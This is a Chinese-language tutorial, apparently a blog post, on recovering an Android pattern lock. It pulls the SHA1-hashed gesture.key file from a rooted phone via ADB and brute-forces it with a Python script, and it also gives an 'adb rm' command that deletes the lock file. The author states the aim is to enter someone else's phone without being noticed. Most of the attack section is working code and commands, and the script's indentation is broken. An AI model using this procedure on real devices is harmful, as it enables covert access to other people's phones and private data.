安卓手機的圖形鎖(九宮格)是3×3的點陣,按次序串連數個點從而達到鎖定/解鎖的功能。最少需要串連4個點,最多能串連9個點。網上也有暴力刪除手機圖形鎖的方法,即直接幹掉圖形鎖功能。本文我們來看看另外一種破解方法。
前提條件:手機需要root,而且開啟偵錯模式。一般來講,如果用過諸如“豌豆莢手機小幫手”、“360手機小幫手”一類的軟體,都會被要求開啟偵錯模式的。如果要刪除手機內建軟體,則需要將手機root。
原理分析
首先科普一下,安卓手機是如何標記這9個點的。通過閱讀安卓系統源碼可知,每個點都有其編號,組成了一個3×3的矩陣,形如:
12300 01 02
03 04 05
06 07 08
假如設定解鎖圖形為一個“L”形,如圖:
那麼這幾個點的排列順序是這樣的:00 03 06 07 08。系統就記下來了這一串數字,然後將這一串數字(以十六進位的方式)進行SHA1加密,儲存在了手機裡的/data/system/gesture.key 檔案中。我們用資料線串連手機和電腦,然後ADB串連手機,將檔案下載到電腦上(命令:adb pull /data/system/gesture.key gesture.key),如圖:
用WinHex等十六進位編輯程式開啟gesture.key,會發現檔案內是SHA1加密過的字串:c8c0b24a15dc8bbfd411427973574695230458f0,如圖:
當你下次解鎖的時候,系統就對比你畫的圖案,看對應的數字串是不是0003060708對應的加密結果。如果是,就解鎖;不是就繼續保持鎖定。那麼,如果窮舉所有的數字串排列,會有多少呢?聯想到高中的階乘,如果用4個點做解鎖圖形的話,就是9x8x7x6=3024種可能性,那5個點就是 15120,6個點的話60480,7個點181440,8個點362880,9個點362880。總共是985824種可能性(但這麼計算並不嚴密,因為同一條直線上的點只能和他們相鄰的點相連)。
滿打滿算,也不到985824種可能性。乍一看很大,但在電腦面前,窮舉出來這些東西用不了幾秒鐘。
破解過程
知道了原理,就著手寫程式來實現吧。這裡使用了Python來完成任務。主要應用了hashlib模組(對字串進行SHA1加密)和itertools模組(Python內建,產生00-09的排列組合)。
主要流程為:
1.ADB串連手機,擷取gesture.key檔案
2.讀取key檔案,存入字串str_A
3.產生全部可能的數字串
4.對這些數字串進行加密,得到字串str_B
5.將字串str_A與str_B進行對比
6.如果字串A,B相同,則說明數字串num就是想要的解鎖順序
7.列印出數字串num
下面為程式:
# -*- coding: cp936 -*-
import itertools
import hashlib
import time
import os
#調用cmd,ADB串連到手機,讀取SHA1加密後的字串
os.system("adb pull /data/system/gesture.key gesture.key")
time.sleep(5)
f=open('gesture.key','r')
pswd=f.readline()
f.close()
pswd_hex=pswd.encode('hex')
print '加密後的密碼為:%s'%pswd_hex
#產生解鎖序列,得到['00','01','02','03','04','05','06','07','08']
matrix=[]
for i in range(0,9):
str_temp = '0'+str(i)
matrix.append(str_temp)
#將00——08的字元進行排列,至少取4個數排列,最多全部進行排列
min_num=4
max_num=len(matrix)
for num in range(min_num,max_num+1):#從04 -> 08
iter1 = itertools.permutations(matrix,num)#從9個數字中挑出n個進行排列
list_m=[]
list_m.append(list(iter1))#將產生的排列全部存放到 list_m 列表中
for el in list_m[0]:#遍曆這n個數位全部排列
strlist=''.join(el)#將list轉換成str。[00,03,06,07,08]-->0003060708
strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#將字串進行SHA1加密
if pswd_hex==strlist_sha1:#將手機檔案裡的字串與加密字串進行對比
print '解鎖密碼為:',strlist
總結
從程式本身來說,得到解鎖密碼後應該用break跳出迴圈並終止程式運行。但Python並沒有跳出多重迴圈的語句,如果要跳出多重迴圈,只能設定標誌位然後不停進行判定。為了運行速度就略去了“跳出迴圈”這個步驟。(有沒有更好的實現跳出多重迴圈的方法?)另外也略去了很多容錯語句。從破解目的來說,如果單單是忘記了自己的手機圖形鎖密碼,完全可以用更簡單的辦法:ADB串連手機,然後“adb rm /data/system/gesture.key”刪除掉gesture.key檔案,此時圖形鎖就失效了,隨意畫一下就能解鎖。但本文開篇假設的是“為了不被察覺地進入到別人的手機裡”,所以就有了這篇文章。
最後提一個安全小建議:如果手機已root,還要用“XX手機小幫手”,還想設定圖形鎖的話——在手機“設定”選項裡,有一個“鎖定狀態下取消USB偵錯模式”(這個名字因手機而異,而且有的有此選項,有的手機就沒有),開啟此功能之後,在手機鎖定狀態下就能夠防範此類攻擊了。此文技術原理很簡單,還望各位大大傳授些高大上的Python編程技巧。